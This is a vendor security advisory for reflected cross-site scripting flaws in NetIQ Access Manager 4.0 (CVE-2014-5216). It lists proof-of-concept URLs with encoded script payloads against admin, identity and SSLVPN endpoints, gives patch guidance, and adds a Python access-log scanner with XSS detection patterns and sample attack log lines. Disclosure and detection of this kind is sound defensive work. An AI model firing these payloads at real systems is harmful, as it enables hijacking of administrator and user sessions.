Reflected Cross Site Scripting (XSS) vulnerability against multiple Access Manager User interfaces allowing effective attacks of Admin Console, Identity Server and SSLVPN sessions - CVE-2014-5216

  • 7015994
  • 15-Dec-2014
  • 17-Dec-2014

Environment

NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Support Pack 1 HF 2 applied
NetIQ Access Manager 4.0 Admin Console server
NetIQ Access Manager 4.0 Identity Server
NetIQ Access Manager 4.0 SSLVPN server
CVE-2014-5216

Situation

The following URLs demonstrate different Reflected Cross Site Scripting (XSS) flaws in the administration interface and the user interface of Access Manager 4.0.

// Admin Console Server
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'

https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E

// Identity Server
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

// SSLVPN Server
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

Resolution

Apply Access Manager 4.0.1 HF3 to address all the above issues except for the following two URLs:

# https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
# https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E

Exploiting the cross site scripting in these two iManager URLs requires that the admin user already be logged in when the URLs are accessed. As a best practice, the Administrator of an Access Management solution should avoid browsing other sites in the same browser that is being used to manage the NAM setup. Although viewed as a lower priority vulnerability, the NAM team nevertheless plans to fix this in the next release of the product (NAM 4.1).
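Until 4.0.1 HF3 is applied, and for the two iManager URLs that remain open until NAM 4.1, it is worth checking the Tomcat or Apache access logs for probes against the endpoints listed above. The script below is an added example written for this article; it is not NetIQ code and nothing in the product emits it. It assumes a combined access-log layout, percent-decodes each query parameter more than once so double-encoded payloads are not missed, collapses the doubled slash seen in the `//nps/servlet/webacc` URL so the path still matches, and reports a finding per suspicious parameter. The log lines embedded in it are constructed for the example and use documentation IP ranges; the marker list is deliberately small and should be tuned before use.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Endpoints named in the advisory (Admin Console, Identity Server, SSLVPN).
AFFECTED_PATHS = {
    "/nps/servlet/webacc",
    "/roma/jsp/debug/debug.jsp",
    "/nidp/jsp/x509err.jsp",
    "/sslvpn/applet_agent.jsp",
}

# Small marker set for reflected-XSS probes; expect false positives on values
# that legitimately contain text such as "reason=" and tune accordingly.
XSS_MARKERS = re.compile(r"<\s*script|<\s*img|on\w+\s*=|javascript:|alert\s*\(", re.IGNORECASE)

# Combined access-log layout (assumed): client identd user [timestamp] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3})'
)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%253C -> %3C -> <) are caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize_path(target):
    """Strip the query string and collapse repeated slashes (//nps/... -> /nps/...)."""
    return re.sub(r"/{2,}", "/", target.partition("?")[0])


def inspect_request(target):
    """Return [(param, decoded_value), ...] for suspicious parameters on an affected path, else None."""
    # Split by hand: urlsplit() would treat a target starting with '//' as host + path.
    path = normalize_path(target)
    if path not in AFFECTED_PATHS:
        return None
    query = target.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):  # parse_qsl decodes once
        decoded = decode_fully(value)
        if XSS_MARKERS.search(decoded):
            hits.append((name, decoded))
    return hits or None


def scan_log(text):
    """Parse access-log lines and return one finding dict per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = inspect_request(m["target"])
        if not hits:
            continue
        for name, decoded in hits:
            findings.append({"client": m["client"], "time": m["ts"],
                             "path": normalize_path(m["target"]),
                             "param": name, "decoded": decoded})
    return findings


# Constructed sample log lines (not from the advisory); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Dec/2014:10:01:12 +0000] "GET /nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Dec/2014:10:01:30 +0000] "GET /nidp/jsp/x509err.jsp?error=certificate%20expired HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - admin [15/Dec/2014:10:02:05 +0000] "GET //nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Dec/2014:10:02:40 +0000] "GET /sslvpn/applet_agent.jsp?lang=%2522%253E%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.4 - admin [15/Dec/2014:10:03:00 +0000] "GET /nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.4 - - [15/Dec/2014:10:03:15 +0000] "GET /portal/search?q=%3Cscript%3E HTTP/1.1" 404 120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    # repr() keeps decoded attacker input from being interpreted by the terminal.
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} param={f['param']!r} value={f['decoded']!r}")
```

Run against the sample, it reports three findings (the `error`, `xss` and `lang` parameters) and stays quiet on the benign `x509err.jsp` request and the normal Admin Console task URL. The request to `/portal/search` carries a marker but is outside the advisory's endpoints, so it is not reported; widen `AFFECTED_PATHS` if you want the same check applied everywhere. A 200 status on a flagged request is the signal to follow up, since it means the parameter was served back rather than rejected.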

Additional Information

NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.